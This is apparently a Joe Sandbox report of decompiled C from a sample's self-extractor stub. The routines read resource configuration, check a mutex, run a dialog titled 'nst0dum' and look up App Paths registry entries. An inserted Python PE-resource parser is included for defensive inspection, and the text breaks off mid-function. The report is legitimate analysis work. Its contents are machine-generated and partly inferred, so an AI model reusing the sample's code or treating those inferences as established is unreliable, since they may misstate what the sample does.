                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-465967434
                                                                                                                                                                                                    • Opcode ID: 614ad43afd87ed0e4a670488e8ecd8f8ffbb8c69c4fb7c052b0b282f89b08591
                                                                                                                                                                                                    • Instruction ID: 1dae6257d8e9851597db5dc79139f2343f9ff2fcd883b455e64e471276ff36cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614ad43afd87ed0e4a670488e8ecd8f8ffbb8c69c4fb7c052b0b282f89b08591
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A516B303802407BEB265B355C8CF7B6E5DEF56B65F508128F2A5E65C0CFA4CE81A369
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
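The routine decompiled below (E00132CAA) pulls its configuration out of the module's own resources: E0013468F("TITLE", ...), E0013468F("EXTRACTOPT", ...) and FindResourceA(_t66, "VERCHECK", 0xa). Resource type 0xa is RT_RCDATA and the lookups use string names, so the stub's settings are named RCDATA entries that can be read from a copy of the file without running it (that E0013468F wraps the same FindResource/LoadResource lookup is an inference from its arguments, not something the report states). The following is an added example, not part of the Joe Sandbox report and not code from the sample: a dependency-free Python walker over the PE resource directory that returns every named RT_RCDATA entry. It has no access to file.exe, so build_test_pe() constructs a minimal PE32 carrying those three resource names with placeholder contents; the header layout, offsets and blob values are the example's own and say nothing about the real sample's configuration.

```python
import struct

RT_RCDATA = 10  # resource type 0xa, the value the stub passes to FindResourceA


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset using the section table."""
    for vsize, vaddr, raw_size, raw_ptr in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _read_entries(data, base, dir_off):
    """Yield (id_or_name, target_offset, is_subdir) for one resource directory."""
    n_named, n_ids = struct.unpack_from("<HH", data, base + dir_off + 12)
    for i in range(n_named + n_ids):
        name, off = struct.unpack_from("<II", data, base + dir_off + 16 + 8 * i)
        if name & 0x80000000:  # high bit set: offset to a UTF-16 name string
            str_off = base + (name & 0x7FFFFFFF)
            (length,) = struct.unpack_from("<H", data, str_off)
            key = data[str_off + 2:str_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, off & 0x7FFFFFFF, bool(off & 0x80000000)


def named_rcdata(pe):
    """Return {name: bytes} for every named RT_RCDATA resource in a PE image."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = struct.unpack_from("<H12xH", pe, e_lfanew + 6)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", pe, opt)
    dd = 96 if magic == 0x10B else 112  # data directory start: PE32 vs PE32+
    (rsrc_rva,) = struct.unpack_from("<I", pe, opt + dd + 8 * 2)  # entry 2 = resources
    sections = [struct.unpack_from("<8xIIII", pe, opt + opt_size + 40 * i)
                for i in range(nsec)]
    base = _rva_to_offset(sections, rsrc_rva)
    found = {}
    for rtype, name_dir, sub in _read_entries(pe, base, 0):            # level 1: type
        if rtype != RT_RCDATA or not sub:
            continue
        for name, lang_dir, sub2 in _read_entries(pe, base, name_dir):  # level 2: name/id
            if not isinstance(name, str) or not sub2:
                continue
            for _lang, ent, sub3 in _read_entries(pe, base, lang_dir):  # level 3: language
                if sub3:
                    continue
                rva, size = struct.unpack_from("<II", pe, base + ent)   # data entry
                off = _rva_to_offset(sections, rva)
                found[name] = pe[off:off + size]
                break  # first language only
    return found


def build_test_pe(rcdata):
    """Construct a minimal PE32 whose only section is .rsrc holding the given
    named RT_RCDATA blobs. Constructed test input, not a runnable executable."""
    RSRC_RVA, RSRC_RAW = 0x1000, 0x200
    names, n = list(rcdata), len(rcdata)
    name_dir = 24                                  # follows the 1-entry type dir
    lang_dir = lambda i: 40 + 8 * n + 24 * i       # one 1-entry dir per name
    data_ent = lambda i: 40 + 32 * n + 16 * i      # one data entry per name
    rsrc, tail = bytearray(40 + 48 * n), bytearray()   # tail: name strings, then blobs
    struct.pack_into("<HH", rsrc, 12, 0, 1)
    struct.pack_into("<II", rsrc, 16, RT_RCDATA, 0x80000000 | name_dir)
    struct.pack_into("<HH", rsrc, name_dir + 12, n, 0)
    for i, name in enumerate(names):
        str_off = len(rsrc) + len(tail)
        tail += struct.pack("<H", len(name)) + name.encode("utf-16-le")
        struct.pack_into("<II", rsrc, name_dir + 16 + 8 * i,
                         0x80000000 | str_off, 0x80000000 | lang_dir(i))
        struct.pack_into("<HH", rsrc, lang_dir(i) + 12, 0, 1)
        struct.pack_into("<II", rsrc, lang_dir(i) + 16, 0x409, data_ent(i))
    for i, name in enumerate(names):
        blob_off = len(rsrc) + len(tail)
        tail += rcdata[name]
        struct.pack_into("<IIII", rsrc, data_ent(i),
                         RSRC_RVA + blob_off, len(rcdata[name]), 0, 0)
    rsrc += tail
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<II", opt, 96 + 8 * 2, RSRC_RVA, len(rsrc))
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), RSRC_RVA, len(rsrc),
                      RSRC_RAW, 0, 0, 0, 0, 0x40000040)
    hdr = dos + coff + opt + sec
    return bytes(hdr) + b"\0" * (RSRC_RAW - len(hdr)) + bytes(rsrc)


if __name__ == "__main__":
    # Constructed input: the names are the ones the stub looks up; the values
    # are placeholders, not the sample's real configuration.
    sample = build_test_pe({"TITLE": b"file.exe\0",
                            "EXTRACTOPT": struct.pack("<I", 0),
                            "VERCHECK": b"\0"})
    for name, blob in named_rcdata(sample).items():
        print("%-12s %r" % (name, blob))
```

Run against a real dropped or submitted file, named_rcdata(open(path, "rb").read()) gives the same TITLE, EXTRACTOPT and VERCHECK blobs the stub reads at runtime, which is the quickest way to tell whether the extraction options and target names seen in the memory dump were already present in the file on disk.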

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00132CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t13 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                    				 *0x139a3c = __ecx;
                                                                                                                                                                                                    				memset(0x139140, 0, 0x8fc);
                                                                                                                                                                                                    				memset(0x138a20, 0, 0x32c);
                                                                                                                                                                                                    				memset(0x1388c0, 0, 0x104);
                                                                                                                                                                                                    				 *0x1393ec = 1;
                                                                                                                                                                                                    				_t20 = E0013468F("TITLE", 0x139154, 0x7f);
                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *0x13858c = _t27;
                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                    					_t64 = 0x139a34;
                                                                                                                                                                                                    					if(E0013468F("EXTRACTOPT", 0x139a34, 4) != 0) {
                                                                                                                                                                                                    						if(( *0x139a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							 *0x139120 =  *0x139120 & _t65;
                                                                                                                                                                                                    							if(E00135C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                    								if( *0x138a3a == 0) {
                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x138184 != 0) {
                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x138a24 == 0) {
                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                    										if(E001336EE(_t65) == 0) {
                                                                                                                                                                                                    											goto L33;
										} else {
											_t33 =  *0x139a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x139a34 & 0x00000100) == 0 || ( *0x138a38 & 0x00000001) != 0 || E001318A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00136517(_t57, 0x7d6, _t34, E001319E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00132390(0x138a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E001344B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0013468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x138588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x139a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E001344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E001344B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
										L11:
										CloseHandle( *0x138588);
										 *0x139124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x139124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00136CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}
                                                                                                                                                                                                    0x00132d6e
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132d59
                                                                                                                                                                                                    0x00132f18

APIs
• memset.MSVCRT ref: 00132CD9
• memset.MSVCRT ref: 00132CE9
• memset.MSVCRT ref: 00132CF9
  • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
  • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
  • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
  • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
  • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
  • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
  • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00132D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00132D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00132DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00132DBD
• CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00132E0A
  • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
  • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
• API String ID: 1002816675-1021407552
• Opcode ID: a4e97fc213d98cf3a7886b8db61e20f0658d898298e37e4c345fb28cebda946e
• Instruction ID: 6b816b3b7bbbaf98cbc21733061e90829ecdf0be7549803c6975854c29237946
• Opcode Fuzzy Hash: a4e97fc213d98cf3a7886b8db61e20f0658d898298e37e4c345fb28cebda946e
• Instruction Fuzzy Hash: 2E51F3B0340301ABE724BB349D4BB7B36ADEB55710F144039F985E69E1DBF88C81DA21
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 81%
E001334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x1391d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0x138584 = _t35;
		E001343D0(_t35, GetDesktopWindow());
		__eflags =  *0x138184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "nst0dum");
		_t17 = CreateThread(0, 0, E00134FE0, 0, 0, 0x138798);
		 *0x13879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E001344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
			_push(0);
			_push(_t35);
			goto L21;
		}
	}
	_t23 = _t13 - 1;
	if(_t23 == 0) {
		__eflags = _a12 - 2;
		if(_a12 != 2) {
			goto L22;
		}
		ResetEvent( *0x13858c);
		_t38 =  *0x138584; // 0x0
		_t25 = E001344B9(_t38, 0x4b2, 0x131140, 0, 0x20, 4);
		__eflags = _t25 - 6;
		if(_t25 == 6) {
			L11:
			 *0x1391d8 = 1;
			SetEvent( *0x13858c);
			_t39 =  *0x13879c; // 0x0
			E00133680(_t39);
			_push(0);
			goto L20;
		}
		__eflags = _t25 - 1;
		if(_t25 == 1) {
			goto L11;
		}
		SetEvent( *0x13858c);
		goto L22;
	}
	if(_t23 == 0xe90) {
		TerminateThread( *0x13879c, 0);
		EndDialog(_a4, _a12);
		return 1;
	}
	return 0;
}

                                                                                                                                                                                                    0x001334fb
                                                                                                                                                                                                    0x001334fe
                                                                                                                                                                                                    0x00133665
                                                                                                                                                                                                    0x00133666
                                                                                                                                                                                                    0x00133666
                                                                                                                                                                                                    0x00133668
                                                                                                                                                                                                    0x0013366e
                                                                                                                                                                                                    0x0013366e
                                                                                                                                                                                                    0x00133671
                                                                                                                                                                                                    0x00133671
                                                                                                                                                                                                    0x00133677
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133677
                                                                                                                                                                                                    0x00133504
                                                                                                                                                                                                    0x00133506
                                                                                                                                                                                                    0x00133507
                                                                                                                                                                                                    0x0013350c
                                                                                                                                                                                                    0x0013365b
                                                                                                                                                                                                    0x0013365f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133661
                                                                                                                                                                                                    0x00133512
                                                                                                                                                                                                    0x00133515
                                                                                                                                                                                                    0x001335be
                                                                                                                                                                                                    0x001335c1
                                                                                                                                                                                                    0x001335d1
                                                                                                                                                                                                    0x001335d8
                                                                                                                                                                                                    0x001335de
                                                                                                                                                                                                    0x001335f8
                                                                                                                                                                                                    0x00133617
                                                                                                                                                                                                    0x00133617
                                                                                                                                                                                                    0x00133623
                                                                                                                                                                                                    0x00133637
                                                                                                                                                                                                    0x0013363d
                                                                                                                                                                                                    0x00133642
                                                                                                                                                                                                    0x00133644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133646
                                                                                                                                                                                                    0x00133652
                                                                                                                                                                                                    0x00133657
                                                                                                                                                                                                    0x00133658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133658
                                                                                                                                                                                                    0x00133644
                                                                                                                                                                                                    0x0013351b
                                                                                                                                                                                                    0x0013351d
                                                                                                                                                                                                    0x0013354f
                                                                                                                                                                                                    0x00133553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013355f
                                                                                                                                                                                                    0x00133565
                                                                                                                                                                                                    0x0013357c
                                                                                                                                                                                                    0x00133581
                                                                                                                                                                                                    0x00133584
                                                                                                                                                                                                    0x0013359b
                                                                                                                                                                                                    0x001335a1
                                                                                                                                                                                                    0x001335a7
                                                                                                                                                                                                    0x001335ad
                                                                                                                                                                                                    0x001335b3
                                                                                                                                                                                                    0x001335b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001335b8
                                                                                                                                                                                                    0x00133586
                                                                                                                                                                                                    0x00133588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133590
                                                                                                                                                                                                    0x00133524
                                                                                                                                                                                                    0x00133535
                                                                                                                                                                                                    0x00133541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133549
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00133535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00133541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0013355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00131140,00000000,00000020,00000004), ref: 00133590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001335C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 001335F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 001335F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00133610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00133617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00133623
                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00133637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00133671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 926bde92cdbd77b24012c2a2dee21a1b3042268cbda6f56a88a6c7674ba16965
                                                                                                                                                                                                    • Instruction ID: 033fed18e00d416c1a7099813a92c50b4c1fd031e6b1be026c217d791876cfe7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 926bde92cdbd77b24012c2a2dee21a1b3042268cbda6f56a88a6c7674ba16965
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031E4B0240300BFD7215F25EC4EE2B3F69EB85B11F544529F66295AB0CB718B80DB59
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00134224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E001344B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x1388c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x1387a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x138598;
					_v36 = 1;
					_v32 = E00134200;
					_v28 = 0x1388c0;
					 *0x13a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x13a288(_t32, 0x1388c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x1388c0 != 0) {
							E00131680(0x1387a0, 0x104, 0x1388c0);
						}
						 *0x13a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x1387a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x1388c0);
					_t61 = 0x1388c0;
					_t4 =  &(_t61[1]); // 0x1388c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x1388c0; // 0x271181
					_t44 = CharPrevA(0x1388c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x1388c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00134236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0013424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00134263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0013427A
• GetTempPathA.KERNEL32(00000104,001388C0,?,00000001), ref: 0013429F
• CharPrevA.USER32(001388C0,00271181,?,00000001), ref: 001342C2
• CharPrevA.USER32(001388C0,00000000,?,00000001), ref: 001342D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00134391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001343A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: ac60b09ee932fbf9bf62e48976308c813110e1bf2bb6d04ce7bda3c2f1b2d2ac
• Instruction ID: 0b26f429a41f388bcae02689ef8b44613f781f5149c8608cd85be9f367ad7f03
• Opcode Fuzzy Hash: ac60b09ee932fbf9bf62e48976308c813110e1bf2bb6d04ce7bda3c2f1b2d2ac
• Instruction Fuzzy Hash: 7541E274A00314AFEB11AFA4EC98AAEBFB4FF49344F5401A9F981A3251CB749C81C761
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

```c
/* Decompiled by Joe Sandbox. Resolves a path macro of the form "#<type><char><rest>"
   into an absolute path: __ecx = output buffer (0x104 = MAX_PATH bytes), _a4 = input spec.
   Comments on constants and helper routines were added for readability; the helper
   semantics (E00131781, E0013658A, E00131680) are inferred from usage and marked likely. */
E00132773(CHAR* __ecx, char* _a4) {
	signed int _v8;
	char _v268;
	char _v269;
	CHAR* _v276;
	int _v280;
	void* _v284;
	int _v288;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t23;
	intOrPtr _t34;
	int _t45;
	int* _t50;
	CHAR* _t52;
	CHAR* _t61;
	char* _t62;
	int _t63;
	CHAR* _t64;
	signed int _t65;

	_t52 = __ecx;
	_t23 =  *0x138004; // 0xe764604f: MSVC /GS security cookie
	_v8 = _t23 ^ _t65; // cookie XOR esp, verified by E00136CE0 on return
	_t62 = _a4;
	_t50 = 0; // success flag
	_t61 = __ecx;
	_v276 = _t62;
	 *((char*)(__ecx)) = 0; // output starts empty
	if( *_t62 != 0x23) { // not '#': treat the whole spec as relative to the system directory
		_t63 = 0x104;
		goto L14;
	} else {
		_t64 = _t62 + 1;
		_v269 = CharUpperA( *_t64); // type letter after '#'
		_v276 = CharNextA(CharNextA(_t64)); // skip the type letter and one more character; the rest is appended later
		_t63 = 0x104;
		_t34 = _v269;
		if(_t34 == 0x53) { // 'S': system directory
			L14:
			GetSystemDirectoryA(_t61, _t63);
			goto L15;
		} else {
			if(_t34 == 0x57) { // 'W': Windows directory
				GetWindowsDirectoryA(_t61, 0x104);
				goto L16;
			} else {
				// any other type letter: look the remainder up under HKLM\...\App Paths
				_push(_t52);
				_v288 = 0x104;
				E00131781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths"); // likely bounded copy
				_t59 = 0x104;
				E0013658A( &_v268, 0x104, _v276); // likely bounded append: key = App Paths + rest
				if(RegOpenKeyExA(0x80000002 /* HKEY_LOCAL_MACHINE */,  &_v268, 0, 0x20019 /* KEY_READ */,  &_v284) != 0) {
					L16:
